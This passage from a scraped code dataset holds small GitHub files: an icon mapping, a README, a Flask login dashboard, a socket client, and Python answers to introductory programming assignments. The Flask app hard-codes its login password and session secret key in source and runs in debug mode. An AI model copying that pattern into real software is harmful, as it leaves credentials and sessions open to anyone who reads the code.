u\"\\uf17b\",\n'fa-linux': u\"\\uf17c\",\n'fa-dribbble': u\"\\uf17d\",\n'fa-skype': u\"\\uf17e\",\n'fa-foursquare': u\"\\uf180\",\n'fa-trello': u\"\\uf181\",\n'fa-female': u\"\\uf182\",\n'fa-male': u\"\\uf183\",\n'fa-gittip': u\"\\uf184\",\n'fa-sun-o': u\"\\uf185\",\n'fa-moon-o': u\"\\uf186\",\n'fa-archive': u\"\\uf187\",\n'fa-bug': u\"\\uf188\",\n'fa-vk': u\"\\uf189\",\n'fa-weibo': u\"\\uf18a\",\n'fa-renren': u\"\\uf18b\",\n'fa-pagelines': u\"\\uf18c\",\n'fa-stack-exchange': u\"\\uf18d\",\n'fa-arrow-circle-o-right': u\"\\uf18e\",\n'fa-arrow-circle-o-left': u\"\\uf190\",\n'fa-toggle-left': u\"\\uf191\",\n'fa-caret-square-o-left': u\"\\uf191\",\n'fa-dot-circle-o': u\"\\uf192\",\n'fa-wheelchair': u\"\\uf193\",\n'fa-vimeo-square': u\"\\uf194\",\n'fa-turkish-lira': u\"\\uf195\",\n'fa-try': u\"\\uf195\",\n'fa-plus-square-o': u\"\\uf196\",\n'fa-space-shuttle': u\"\\uf197\",\n'fa-slack': u\"\\uf198\",\n'fa-envelope-square': u\"\\uf199\",\n'fa-wordpress': u\"\\uf19a\",\n'fa-openid': u\"\\uf19b\",\n'fa-institution': u\"\\uf19c\",\n'fa-bank': u\"\\uf19c\",\n'fa-university': u\"\\uf19c\",\n'fa-mortar-board': u\"\\uf19d\",\n'fa-graduation-cap': u\"\\uf19d\",\n'fa-yahoo': u\"\\uf19e\",\n'fa-google': u\"\\uf1a0\",\n'fa-reddit': u\"\\uf1a1\",\n'fa-reddit-square': u\"\\uf1a2\",\n'fa-stumbleupon-circle': u\"\\uf1a3\",\n'fa-stumbleupon': u\"\\uf1a4\",\n'fa-delicious': u\"\\uf1a5\",\n'fa-digg': u\"\\uf1a6\",\n'fa-pied-piper-square': u\"\\uf1a7\",\n'fa-pied-piper': u\"\\uf1a7\",\n'fa-pied-piper-alt': u\"\\uf1a8\",\n'fa-drupal': u\"\\uf1a9\",\n'fa-joomla': u\"\\uf1aa\",\n'fa-language': u\"\\uf1ab\",\n'fa-fax': u\"\\uf1ac\",\n'fa-building': u\"\\uf1ad\",\n'fa-child': u\"\\uf1ae\",\n'fa-paw': u\"\\uf1b0\",\n'fa-spoon': u\"\\uf1b1\",\n'fa-cube': u\"\\uf1b2\",\n'fa-cubes': u\"\\uf1b3\",\n'fa-behance': u\"\\uf1b4\",\n'fa-behance-square': u\"\\uf1b5\",\n'fa-steam': u\"\\uf1b6\",\n'fa-steam-square': u\"\\uf1b7\",\n'fa-recycle': u\"\\uf1b8\",\n'fa-automobile': u\"\\uf1b9\",\n'fa-car': u\"\\uf1b9\",\n'fa-cab': u\"\\uf1ba\",\n'fa-taxi': u\"\\uf1ba\",\n'fa-tree': u\"\\uf1bb\",\n'fa-spotify': u\"\\uf1bc\",\n'fa-deviantart': u\"\\uf1bd\",\n'fa-soundcloud': u\"\\uf1be\",\n'fa-database': u\"\\uf1c0\",\n'fa-file-pdf-o': u\"\\uf1c1\",\n'fa-file-word-o': u\"\\uf1c2\",\n'fa-file-excel-o': u\"\\uf1c3\",\n'fa-file-powerpoint-o': u\"\\uf1c4\",\n'fa-file-photo-o': u\"\\uf1c5\",\n'fa-file-picture-o': u\"\\uf1c5\",\n'fa-file-image-o': u\"\\uf1c5\",\n'fa-file-zip-o': u\"\\uf1c6\",\n'fa-file-archive-o': u\"\\uf1c6\",\n'fa-file-sound-o': u\"\\uf1c7\",\n'fa-file-audio-o': u\"\\uf1c7\",\n'fa-file-movie-o': u\"\\uf1c8\",\n'fa-file-video-o': u\"\\uf1c8\",\n'fa-file-code-o': u\"\\uf1c9\",\n'fa-vine': u\"\\uf1ca\",\n'fa-codepen': u\"\\uf1cb\",\n'fa-jsfiddle': u\"\\uf1cc\",\n'fa-life-bouy': u\"\\uf1cd\",\n'fa-life-saver': u\"\\uf1cd\",\n'fa-support': u\"\\uf1cd\",\n'fa-life-ring': u\"\\uf1cd\",\n'fa-circle-o-notch': u\"\\uf1ce\",\n'fa-ra': u\"\\uf1d0\",\n'fa-rebel': u\"\\uf1d0\",\n'fa-ge': u\"\\uf1d1\",\n'fa-empire': u\"\\uf1d1\",\n'fa-git-square': u\"\\uf1d2\",\n'fa-git': u\"\\uf1d3\",\n'fa-hacker-news': u\"\\uf1d4\",\n'fa-tencent-weibo': u\"\\uf1d5\",\n'fa-qq': u\"\\uf1d6\",\n'fa-wechat': u\"\\uf1d7\",\n'fa-weixin': u\"\\uf1d7\",\n'fa-send': u\"\\uf1d8\",\n'fa-paper-plane': u\"\\uf1d8\",\n'fa-send-o': u\"\\uf1d9\",\n'fa-paper-plane-o': u\"\\uf1d9\",\n'fa-history': u\"\\uf1da\",\n'fa-circle-thin': u\"\\uf1db\",\n'fa-header': u\"\\uf1dc\",\n'fa-paragraph': u\"\\uf1dd\",\n'fa-sliders': u\"\\uf1de\",\n'fa-share-alt': u\"\\uf1e0\",\n'fa-share-alt-square': u\"\\uf1e1\",\n'fa-bomb': u\"\\uf1e2\",\n}" }, { "alpha_fraction": 0.752212405204773, "alphanum_fraction": 0.752212405204773, "avg_line_length": 27.25, "blob_id": "cd0d9148f9d0d258e32f3cf18b72801987e39b9f", "content_id": "9de77e0e9b7f0d1fa9313d87d24808923e969b61", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 113, "license_type": "permissive", "max_line_length": 89, "num_lines": 4, "path": "/README.md", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "KivySurvey\n==========\n\nThe KivySurvey widget allows you to embed surveys defined via json into your application.\n" } ]
8
sandip5004/jumia-dashboard
https://github.com/sandip5004/jumia-dashboard
7d7bafbf85a07e1eb67fee66464fa1b9e0216315
9c1093385fb233122ed0b6fed296310c7a8a8173
9825dedd441013f4e8df8efd4c3126a2349dc952
refs/heads/master
2020-07-28T10:39:12.020083
2019-09-26T12:32:49
2019-09-26T12:32:49
209,395,900
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.6086747050285339, "alphanum_fraction": 0.6163855195045471, "avg_line_length": 28.239437103271484, "blob_id": "db1fa64b20a37ae0dae536c115ed244dfea535e9", "content_id": "35c2a2f6c0031654b1dc3918990216e971a40737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2075, "license_type": "no_license", "max_line_length": 87, "num_lines": 71, "path": "/app.py", "repo_name": "sandip5004/jumia-dashboard", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nfrom flask_login import LoginManager\nfrom flask import session, redirect, g, request\nfrom functools import wraps\nimport json\n\napp = Flask(__name__)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\napp.secret_key = \"jumiabot\"\n\ndef web_login_required(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n session_login = session.get('session_login', None)\n if not session_login:\n return redirect('/login', 302)\n return f(*args, **kwargs)\n return decorated_function\ndef file_put_contents(file_name,contents='',mode='w'):\n try:\n with open(file_name, mode) as f:\n f.write(contents)\n return True\n except:\n return False\n\ndef file_get_contents(file_name):\n try:\n with open(file_name) as file:\n data = file.read()\n return data.strip()\n except:\n return False\n\[email protected](\"/\")\n@web_login_required\ndef index():\n products = json.loads(file_get_contents('./products.json'))\n bot_results = {}\n return render_template('dashboard.html',products=products, bot_results=bot_results)\n\[email protected](\"/logout\")\n@web_login_required\ndef logout():\n session_login = session.get('session_login', None)\n if session_login:\n session.pop('session_login')\n return redirect('/login', 302)\n\[email protected](\"/login\", methods=['GET', 'POST'])\ndef login():\n context={}\n if request.method == 'POST':\n email = request.form.get('email',None)\n password = request.form.get('password',None)\n if email == '[email protected]' and password == 'Yacine123':\n session.permanent = True\n session['session_login'] = \"user\"\n return redirect('/', 302)\n else:\n context = {\"error\":\"Email or Password Does not match\"}\n else:\n session_login = session.get('session_login', None)\n if session_login:\n return redirect('/', 302)\n return render_template('login.html',**context)\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=8001)" } ]
1
josejohn13/csp-exercises
https://github.com/josejohn13/csp-exercises
aa184272e9fef5ff4f9ed0d4e74f652a962b5587
d4aa54408a9f4d5ca52ee690e4af10094767f819
5f7a8e5c5a11aff14409ef511e3c440f0e4bfb9d
refs/heads/master
2020-12-06T23:58:52.906551
2020-01-16T08:13:48
2020-01-16T08:13:48
232,587,243
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6821191906929016, "alphanum_fraction": 0.7417218685150146, "avg_line_length": 29.399999618530273, "blob_id": "ea44352a430a9a262d77ba977c5ac870253ffe78", "content_id": "e220a0bf33ce28b706d4e8cb8cc78f40da0bc5bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 51, "num_lines": 5, "path": "/20200108/CLIENT1.py", "repo_name": "josejohn13/csp-exercises", "src_encoding": "UTF-8", "text": "import socket\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect ((socket.gethostname(), 1024))\nmsg=s.recv(1024)\nprint(msg.decode (\"utf-8\"))" } ]
1
aj-git02/COL100-assignments
https://github.com/aj-git02/COL100-assignments
9dc3445e1e265fba5ad5a2559a8195f88f8a30ea
a5419b1d876e7f45c003cf15ad9f3e3abe7c7bfb
87c0a67816ed0738f292d20b70add8682efd4abc
refs/heads/main
2023-06-15T20:11:12.209804
2021-07-15T14:37:11
2021-07-15T14:37:11
386,288,265
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7818182110786438, "alphanum_fraction": 0.8363636136054993, "avg_line_length": 26.5, "blob_id": "8199bd78bc5e30968757596acd0c0abe121d5d6a", "content_id": "479273a7b2a432a0a6fd887df99da40a263ae229", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 55, "license_type": "no_license", "max_line_length": 40, "num_lines": 2, "path": "/README.md", "repo_name": "aj-git02/COL100-assignments", "src_encoding": "UTF-8", "text": "# COL100-assignments and their solutions\nfor posterity\n" }, { "alpha_fraction": 0.5657752752304077, "alphanum_fraction": 0.5781755447387695, "avg_line_length": 34.94023895263672, "blob_id": "0721be7178667a6cb0dcb7ca5b0f47eb170c5927", "content_id": "8b8a9e17fa7f78e8b1bfc36d43ee0ec92606810b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9274, "license_type": "no_license", "max_line_length": 209, "num_lines": 251, "path": "/assg 4 submitted.py", "repo_name": "aj-git02/COL100-assignments", "src_encoding": "UTF-8", "text": "#problem 1\r\n\r\n#the function isint(x) checks whether the string x is made of integer or has decimal\r\ndef isint(x):\r\n for i in range(0,10):\r\n #assert: x is a string with a single element\r\n #invariant: the string does not contain intgers from 0 to i-1\r\n #note here instead of str function indiviual cases of '1','2''etc. could also have been made\r\n if x==str(i):\r\n #assert: string has an integer\r\n return True\r\n #assert:string does not have a integer\r\n if x=='.':\r\n #assert: string has a decimal\r\n return True\r\n #assert:string does not have a integer or a decimal\r\n return False\r\n\r\n#readNumber is the function asked in problem statement\r\ndef readNumber(s,i):\r\n #assert:s[i] is a integer\r\n j=i+1\r\n a=len(s)\r\n while (j!=a and isint(s[j])):\r\n #invariant: s[i:j] contains a integer or a float and j is not equal to a\r\n j+=1\r\n return (s[i:j],j)\r\n\r\n#signeval takes two floats x,y identifies the sign in string a and performs the required computation\r\ndef signeval(x,y,a):\r\n if a=='+':\r\n return x+y\r\n if a=='-':\r\n return x-y\r\n if a=='*':\r\n return x*y\r\n if a=='/':\r\n return x/y\r\n\r\n#evalParen is the function asked in problem statement\r\ndef evalParen(s,i):\r\n #assert: the input inside brackets may be of four forms\r\n #'sign may be other than +'\r\n #case1 : ()+x \r\n #case2 : ()+()\r\n #case3 : x+y\r\n #case4 : x+()\r\n # only (x) does not make sense \r\n if s[i+1]=='(':\r\n #assert: case 1 or case 2 have to be tackled\r\n (a,b)=evalParen(s,i+1)\r\n #assert: s[b] contains the operator according to which operation has to be done\r\n if s[b+1]=='(':\r\n #assert: case 2 has to be tackled\r\n (c,d)=evalParen(s,b+1)\r\n return (signeval(float(a),float(c),s[b]),d+1)\r\n #assert: case 1 has to be tackled\r\n (c,d)=readNumber(s,b+1)\r\n return (signeval(float(a),float(c),s[b]),d+1)\r\n #assert: either case 3 or case 4\r\n (a,b)=readNumber(s,i+1)\r\n if isint(s[b+1])==True:\r\n #assert: case 3 has to be tackled\r\n (c,d)=readNumber(s,b+1)\r\n return (signeval(float(a),float(c),s[b]),d+1)\r\n #assert: case 4 has to be tackled\r\n (e,f)=evalParen(s,b+1)\r\n return (signeval(float(a),float(e),s[b]),f+1)\r\n\r\n#evaluate is the function asked in problem statement\r\ndef evaluate(s):\r\n #assert: there are two cases for the input\r\n #case1: single number\r\n #case2: combination like x+y or x+() or ()+x\r\n if isint(s[0]):\r\n (a,b)=readNumber(s,0)\r\n if len(s)==b:\r\n #assert: this is case1\r\n return a\r\n #assert:case2 is the only case left\r\n #in this brackets can be added to the string and evalParen can be used\r\n s='('+s+')'\r\n (b,c)=evalParen(s,0)\r\n return b\r\n\r\n\r\n#problem 2\r\n\r\n# sumcheck checks whther x can be represented as a sum of two distinct numbers from l in a unique way\r\ndef sumcheck(x,l):\r\n count=0\r\n for i in range(len(l)):\r\n #invariant 1: count represents the number of ways in which the number x can be represented as a sum of two distinct numbers from l, one of the numbers having index between 0,i-1\r\n for j in range(i+1,len(l)):\r\n #invariant 2: count represents the number of ways in which the number x can be represented as a sum of two distinct numbers from l, (one being from 0,i-1) or (one being i and other between i+1,j-1)\r\n if x==l[i]+l[j] :\r\n count+=1\r\n if count>=2 :\r\n # assert: x can be represented as sum of two distinct numbers from l in more than one way\r\n return False\r\n #assert: count represents the number of ways in which the number x can be represented as a sum of two distinct numbers from l, one of the numbers having index between 0,i\r\n #assert: count represents the number of ways in which the number x can be represented as a sum of two distinct numbers from l\r\n if count==0:\r\n #assert: x cannot be represented as sum of two distinct numbers from l in any way\r\n return False\r\n #assert count==1 and x can be represented as a sum of two distinct numbers from l in a unique way\r\n return True\r\n\r\n\r\n# next term provides the next term of the given sequence\r\ndef nextterm(l):\r\n x=l[-1]+1\r\n while (not sumcheck(x,l)):\r\n #invariant: all numbers between l[-1] and x including x cannot be part of the sequence\r\n x+=1\r\n #assert: x satisfies sumcheck(x,l) and all numbers between l[-1] and x do not satisfy hence x is next term of the sequence\r\n return x\r\n \r\n# sumSequence provides the required list\r\ndef sumSequence(n):\r\n a=[1,2]\r\n while len(a)!=n:\r\n #len(a)!=n hence more terms have to be appended to list a \r\n a.append(nextterm(a))\r\n # assert len(a)==n and a contains the numbers of the asked sequence\r\n return a \r\n\r\n\r\n#problem 3\r\n\r\ndef sumlist(l):\r\n sum=l[0]\r\n for i in range(len(l)-1):\r\n # invariant: sum = sum of all elements till index i of the list at start of loop\r\n sum+=l[i+1]\r\n #assert sum = sum of all elements in the list\r\n return sum\r\n\r\ndef min(a,b):\r\n if a<=b: return a\r\n else : return b\r\n #assert min returns minimum of a and b\r\n\r\ndef minLength(a,n):\r\n ans=len(a)+2\r\n # at start ans is unrealistic so that (*does not exist case*) may be detected\r\n for i in range(len(a)):\r\n # invariant 1: ans is the least length of a contigous list whose sum>n and starts from index 0..i-1 if such list exists\r\n for j in range(i,len(a)):\r\n # invariant 2: ans is the least length of a contigous list whose sum>n and starts from index 0..i-1 or starts at index i and is contained in a[i:j] if such list exists\r\n if sumlist(a[i:j+1])>n :\r\n ans=min(ans,len(a[i:j+1]))\r\n #assert: ans is the least length of a contigous list whose sum>n and starts from index 0...i if such list exists\r\n # assert: ans is the least length of a contigous list whose sum>n if such list existsif not exist then ans=len(a)+2\r\n if ans == len(a) +2 :\r\n #assert no such contigous list exist\r\n return -1\r\n else :\r\n #assert the minimum length of the contigous list is ans\r\n return ans\r\n\r\n\r\n# problem 4\r\n\r\n\r\n# Merges two subarrays of arr[] write the output to b[l:r]\r\n# First subarray is arr[l:m] # Second subarray is arr[m:r]\r\ndef mergeAB(arr,b, l, m, r):\r\n i = l # Initial index of first subarray\r\n j = m # Initial index of second subarray\r\n k = l # Initial index of merged subarray\r\n while i < m and j < r :\r\n #invariant: list b from index l to k-1 is sorted\r\n if arr[i] <= arr[j]:\r\n b[k] = arr[i]\r\n i += 1\r\n else:\r\n b[k] = arr[j]\r\n j += 1\r\n k += 1\r\n while i < m:\r\n # Copy the remaining elements of arr[i:m], if there are any\r\n b[k] = arr[i]\r\n i += 1\r\n k += 1\r\n while j < r:\r\n # Copy the remaining elements of arr[j:r], if there are any\r\n b[k] = arr[j]\r\n j += 1\r\n k += 1\r\n\r\n\r\ndef mergeit(A,B,n,l):\r\n # A of size n consists of n/l sorted lists of size l each [last list may be shorter]\r\n # merge them in pairs writing the result to B [there may be one unpaired if not even]\r\n if n%l == 0:\r\n count=n//l\r\n else:\r\n count=n//l + 1\r\n for i in range( count//2 ):\r\n # invariant: all the elements upto upto 2*i*l have been copied into b as i sorted lists of length 2l each\r\n left=i*l*2\r\n right=min(left+2*l,n) # since last list could be shorter\r\n mergeAB(A,B,left,left+l,right)\r\n # Copy the last list if there is any (may happen if count is odd)\r\n for i in range(right,n):\r\n #assert: count was odd hence one list could not be paired with others\r\n B[i]=A[i]\r\n\r\ndef mergeSort(A):\r\n n=len(A)\r\n l=1\r\n B=[0 for x in range(n)]\r\n dir=0\r\n while l < n:\r\n #invariant: A or B according to value of dir contain n/l sorted lists of size l each [last list may be shorter]\r\n if dir == 0:\r\n #we have to copy result from A to B\r\n mergeit(A,B,n,l)\r\n dir=1\r\n else:\r\n #we have to copy result from B to A\r\n mergeit(B,A,n,l)\r\n dir=0\r\n l*=2\r\n #if result is in B copy result to A\r\n if dir==1:\r\n for i in range(n):\r\n A[i]=B[i]\r\n\r\ndef mergeContacts(l):\r\n mergeSort(l)\r\n #assert: list is sorted hence same names will occur consecutively\r\n #assert: list is not empty\r\n (a,b)=l[0]\r\n l[0]=(a,[b])\r\n ans=[l[0]]\r\n for i in range(1,len(l)):\r\n #invariant: emails have been merged for all people having entries till index i-1 and appended to ans\r\n (w,x)=l[i-1]\r\n (y,z)=l[i]\r\n if w==y:\r\n #assert: l[i] and l[i-1] have the same names hence emails to be merged\r\n (g,h)=ans[-1]\r\n h.append(z)\r\n ans[-1]=(g,h)\r\n else:\r\n l[i]=(y,[z])\r\n ans.append(l[i])\r\n #assert: ans contains merged result obtained from merging all entries with same names in l\r\n return ans\r\n\r\n" }, { "alpha_fraction": 0.5096269845962524, "alphanum_fraction": 0.5453670024871826, "avg_line_length": 39.0098991394043, "blob_id": "79f63cb8d53b7c70fef121eaba1ddb0a62d0a49d", "content_id": "ddeb48529e570dffe97791d1e9ea5cee70b597b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8310, "license_type": "no_license", "max_line_length": 249, "num_lines": 202, "path": "/assg5 submitted.py", "repo_name": "aj-git02/COL100-assignments", "src_encoding": "UTF-8", "text": "#2020CS10318\r\n#assignment 5\r\n#Akarsh Jain\r\n\r\n#problem 1\r\ndef gridPlay(grid):\r\n m=len(grid[0]) #number of rows\r\n n=len(grid) #number of coloumns\r\n a=[grid[j] for j in range(n)]\r\n for j in range(1,m):\r\n #invariant: the entries from a[0][0] to a[0][j-1] represent the penalty in reaching that position\r\n a[0][j]=grid[0][j]+a[0][j-1]\r\n for i in range(1,n):\r\n #invariant: the entries from a[0][0] to a[i-1][0] represent the penalty in reaching that position\r\n a[i][0]=grid[i][0]+ a[i-1][0] \r\n for i in range(1,n):\r\n #invariant: the entries in a till a[i-1] (i-1 th row) represent the penalty in reaching that position\r\n for j in range(1,m):\r\n #invariant: the entries in a till a[i][j-1] represent the penalty in reaching that position\r\n a[i][j]=min(a[i-1][j],a[i-1][j-1],a[i][j-1])+grid[i][j]\r\n #assert: the entries in a till a[i][j] represent the penalty in reaching that position\r\n #asset:the entries in a till a[i] (i th row) represent the penalty in reaching that position\r\n \r\n #assert: the penalty faced is the value of entry a[n-1][m-1] by invariant\r\n return a[n-1][m-1]\r\n\r\n#problem 2\r\n\r\n# this function checks whether the input is vowel of consonant\r\ndef vowel(n):\r\n if n in ['a','e','i','o','u']:\r\n return True\r\n return False\r\n \r\ndef stringProblem(a,b):\r\n #assert: a,b are non-empty strings\r\n A=[[0 for i in range(len(b)+1)] for j in range(len(a)+1)]\r\n # character b[j-1] represents jth index coloumn (coloumn starting from 0)\r\n # character a[i-1] represents ith index row (row starting from 0) \r\n for i in range(len(b)+1): # reason for doing this loop is written at last of this function **\r\n A[0][i]=i\r\n for j in range(len(a)+1):\r\n A[j][0]=j\r\n for i in range(1,len(a)+1):\r\n #invariant: A[x][y] represents the min. number of changes to convert string a[0:x] to b[0:y] for x<i\r\n for j in range(1,len(b)+1):\r\n #invariant: A[x][y] represents the min. number of changes to convert string a[0:x] to b[0:y] for x<i+1,y<j\r\n if a[i-1]==b[j-1]:\r\n # since the two characters are already equal min no. changes will be the changes required to change the remaining list\r\n A[i][j]=A[i-1][j-1]\r\n else:\r\n if vowel(a[i-1]):\r\n if vowel(b[j-1]):\r\n # min of three possibilities either replace a[i-1] by b[j-1] or delete a[i-1] or insert b[j-1]\r\n A[i][j]=1+min(A[i-1][j],A[i][j-1],A[i-1][j-1])\r\n # A[i-1][j] represent deletion of element from string a\r\n # A[i][j-1] represents insertion of an element in string a and then since the elements will be equal min changes in the remaining part of the string have to be found out\r\n # A[i-1][j-1] represents replacement of a[i-1] by b[j-1]\r\n else:\r\n # min of two possibilities either delete a[i-1] or insert b[j-1]\r\n # replacement is not possible in this case\r\n A[i][j]=1+min(A[i-1][j],A[i][j-1])\r\n else:\r\n # min of three possibilities either replace a[i-1] by b[j-1] or delete a[i-1] or insert b[j-1]\r\n A[i][j]=1+min(A[i-1][j],A[i][j-1],A[i-1][j-1])\r\n #assert: A[x][y] represents the min. number of changes to convert string a[0:x] to b[0:y] for x<i,y<j+1\r\n #assert: A[x][y] represents the min. number of changes to convert string a[0:x] to b[0:y] for x<i+1\r\n return A[len(a)][len(b)]\r\n# ** Reason for doing the middle loop: the first row and first coloumn of the matrix are there for the case in which deletion of element occurs and one of the string gets empty and then min changes will be the number of elements in the other string.\r\n# explained with greater detail in .pdf file\r\n\r\n\r\n\r\n#problem 3\r\n\r\n# this checks whether n is a leap year or not\r\ndef isleap(n):\r\n if n%4 != 0:\r\n return False\r\n if n%400==0:\r\n return True\r\n if n%100==0:\r\n return False\r\n return True\r\n\r\n#this calculates the day of 1st january for a input year n (1 is monday,2 tuesday....)\r\ndef jan(n):\r\n # initially count is 1 represents 1st jan 1753 was monday\r\n count=1\r\n a=n-1\r\n while a>=1753:\r\n if isleap(a):\r\n count+=2\r\n #since 366%7=2 hence count must be altered by 2\r\n else:\r\n count+=1\r\n #since 365%7=1 hence count must be altered by 1\r\n a-=1\r\n if count%7==0:\r\n #this is introduced since days staring from 1\r\n return 7\r\n return count%7\r\n\r\n\r\nmlist={1:'January',2:'February',3:'March',4:'April',5:'May',6:'June',7:'july',8:'August',9:'September',10:'October',11:'November',12:'December'}\r\n\r\n# monuber gives the number of days in a month\r\ndef monumber(n,x):\r\n # n is the month number from mlist\r\n # x is the year \r\n if n==1 or n==3 or n==5 or n==7 or n==8 or n==10 or n==12 :\r\n return 31\r\n if n==2:\r\n if isleap(x):\r\n return 29\r\n else:\r\n return 28\r\n return 30\r\n\r\n#mostart gives the day on which the month will start\r\ndef mostart(a,b):\r\n #a= month number from mlist\r\n #b= year\r\n i=1\r\n s=jan(b)\r\n while i<a:\r\n if (s+monumber(i,b))%7==0:\r\n #this case had to be made since days have been considered numbered from 1 to 7. so 0 must represent 7\r\n s=7\r\n else:\r\n s=(s+monumber(i,b))%7\r\n i+=1\r\n return s\r\n\r\n#nextweek gives the date from which next week of a month is to be started\r\ndef nextweek(a,b):\r\n #a is the start date of previous week ( in case of firat week it is 1 )\r\n #b is the start day of the previous week\r\n return 8+a-b\r\n\r\n\r\n# month writes to the file f a set of three months side by side i.e. with month numbers a,a+1,a+2 \r\ndef month(a,b,f):\r\n #a=month set to be printed is a,a+1.a+2\r\n #b=year\r\n #f=file in which calendar is made\r\n # x1,x2 | y1,y2 | z1,z2 represent the staring day and starting date for each of the side by side months\r\n x1=mostart(a,b) \r\n x2=1 \r\n y1=mostart(a+1,b)\r\n y2=1\r\n z1=mostart(a+2,b)\r\n z2=1\r\n f.write('{:^21}{:^25}{:^21}'.format(mlist[a],mlist[a+1],mlist[a+2])+'\\n') \r\n f.write('{:<21}{:^25}{:>21}'.format(' M T W T F S S',' M T W T F S S',' M T W T F S S')+'\\n')\r\n for i in range(1,7):\r\n #i represents the week number \r\n for k in range(x1-1):\r\n #this leaves spaces when the week does not start from monday (e.g jan 1 comes on thursday)\r\n f.write(' ')\r\n for j in range(x2,8-x1+x2):\r\n #this prints the dates of a week\r\n if j<=monumber(a,b):\r\n f.write(' {0:0=2d}'.format(j))\r\n else:\r\n # this means that all dates coming in a month have been written. just for proper formatting spaces are introduced\r\n f.write(' ')\r\n f.write(' ')\r\n # same for month a+1\r\n for k in range(y1-1):\r\n f.write(' ')\r\n for j in range(y2,8-y1+y2):\r\n if j<=monumber(a+1,b): \r\n f.write(' {0:0=2d}'.format(j))\r\n else:\r\n f.write(' ')\r\n f.write(' ')\r\n #same for month a+2\r\n for k in range(z1-1):\r\n f.write(' ')\r\n for j in range(z2,8-z1+z2):\r\n if j<=monumber(a+2,b):\r\n f.write(' {0:0=2d}'.format(j))\r\n else:\r\n f.write(' ')\r\n f.write('\\n')\r\n # x2,y2,z2 representing dates are assigned new values using nextweek function\r\n x2=nextweek(x2,x1)\r\n y2=nextweek(y2,y1)\r\n z2=nextweek(z2,z1)\r\n # x1,x2,x3 will be 1 because start day of further weeks will be monday \r\n x1=1\r\n y1=1\r\n z1=1\r\n\r\ndef printCalendar(n):\r\n with open('calendar.txt','x') as f:\r\n f.write('{:^67}'.format(n)+'\\n') #writes the year on top of calendar\r\n for i in [1,4,7,10]:\r\n month(i,n,f)\r\n #by definition of month function it prints 3 months side by side. so eventually all 12 months will be printed\r\n f.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.4534986615180969, "alphanum_fraction": 0.4644227921962738, "avg_line_length": 37.81764602661133, "blob_id": "824621440c7a702dbf120724164cdb68fa3a6f5d", "content_id": "9c30a1f8562486b42ec5a49141bdb22e7ec860f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13548, "license_type": "no_license", "max_line_length": 143, "num_lines": 340, "path": "/assg 6 submitted.py", "repo_name": "aj-git02/COL100-assignments", "src_encoding": "UTF-8", "text": "#Akarsh Jain\r\n# 2020CS10318\r\n#assignment 6\r\n\r\n#problem 1 \r\n\r\nclass Quiz:\r\n def __init__(self,title,answer):\r\n self.title=title\r\n self._answer=answer #list of answers\r\n self._attempts={} # this is a dictionary which stores (entryNo:response)\r\n def _score(self,student):\r\n # student input is the entryNo\r\n self._sc=0\r\n for i in range(len(self._answer)):\r\n if self._answer[i]==self._attempts[student][i]:\r\n self._sc+=1\r\n return self._sc #represents number of correct answers\r\n\r\n \r\nclass Course:\r\n def __init__(self,courseCode,Q_list):\r\n self.courseCode=courseCode\r\n self._Q_list=Q_list # list of quizzes\r\n\r\n\r\nclass Student:\r\n def __init__(self,entryNo,C_list):\r\n self.entryNo=entryNo\r\n self._C_list=C_list #list of courses student is taking\r\n def attempt(self,courseCode,quizTitle,attemptedAnswers):\r\n for course in self._C_list:\r\n if course.courseCode==courseCode:\r\n for quiz in course._Q_list:\r\n if quiz.title==quizTitle:\r\n if not self.entryNo in quiz._attempts: #checks whether already attempted \r\n quiz._attempts[self.entryNo]=attemptedAnswers #entry added to dictionary\r\n \r\n def getUnattemptedQuizzes(self):\r\n self._unattempt=[]\r\n for course in self._C_list:\r\n for quiz in course._Q_list:\r\n if not self.entryNo in quiz._attempts:\r\n self._unattempt.append((course.courseCode,quiz.title))\r\n return self._unattempt\r\n \r\n def getAverageScore(self,courseCode):\r\n self._sum=0\r\n self._number=0\r\n for course in self._C_list:\r\n if course.courseCode==courseCode:\r\n for quiz in course._Q_list:\r\n if self.entryNo in quiz._attempts:\r\n self._sum+=quiz._score(self.entryNo)\r\n self._number+=1\r\n #self._sum is the total of all attempted quizzes\r\n #self._number is the number of attempted quizzes\r\n return self._sum/self._number\r\n\r\n\r\n#problem 2\r\nclass Matrix:\r\n def __init__(self,l):\r\n self.list=l # gives the matrix in list of list dense form\r\n def __str__(self):\r\n for row in self.list:\r\n for item in row:\r\n print('{} '.format(item),end='')\r\n print('\\n')\r\n return ''\r\n def rows(self):\r\n return len(self.list) #number of rows\r\n def coloumns(self):\r\n return len(self.list[0]) #number of coloumns\r\n def __add__(self,a):\r\n n=self.rows()\r\n m=self.coloumns()\r\n x=[[(self.list[i][j]+a.list[i][j]) for j in range(m)] for i in range(n)]\r\n return Matrix(x)\r\n def __sub__(self,a):\r\n n=self.rows()\r\n m=self.coloumns()\r\n x=[[(self.list[i][j]-a.list[i][j]) for j in range(m)] for i in range(n)]\r\n return Matrix(x)\r\n def __mul__(self,x):\r\n a=self.rows()\r\n b=self.coloumns()\r\n assert len(x.list)==b\r\n c=len(x.list[0])\r\n aux=[[0 for i in range(c)]for j in range(a)]\r\n for i in range(c):\r\n for j in range(a):\r\n for k in range(b):\r\n aux[j][i]+=(self.list[j][k]*x.list[k][i])\r\n return Matrix(aux)\r\n def toSparse(self):\r\n 